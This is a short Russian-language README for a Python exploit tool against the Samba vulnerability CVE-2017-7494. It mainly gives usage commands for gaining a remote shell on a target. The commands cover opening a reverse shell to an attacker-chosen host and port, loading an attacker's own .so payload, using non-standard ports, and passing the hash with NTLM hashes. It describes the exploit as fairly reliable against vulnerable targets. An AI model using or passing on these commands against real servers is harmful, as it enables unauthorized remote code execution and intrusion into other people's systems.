
python-эксплойт для CVE-2017-7494
Удаленный эксплойт для уязвимости SAMBA CVE-2017-7494, также известной как is_know_pipename!
Этот эксплойт разделен на 3 части:
Пока цель уязвима и полезная нагрузка соответствует операционной системе и архитектуре цели, эксплойт довольно надежен.
Запустите эксплойт против цели и дождитесь появления оболочки:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
Для версий Samba 3.5.0 > 3.6.0 просто добавьте аргумент -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Запустите свой собственный .so файл
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
Для нестандартного порта Samba используйте аргумент -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
Если вы столкнулись с хэшами smbpasswd и не можете их взломать, теперь вы можете выполнить pass-the-hash с помощью аргумента --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
Этот репозиторий вдохновлен репозиториями: joxeankoret/exploit-CVE-2017-7494 и Archivaldo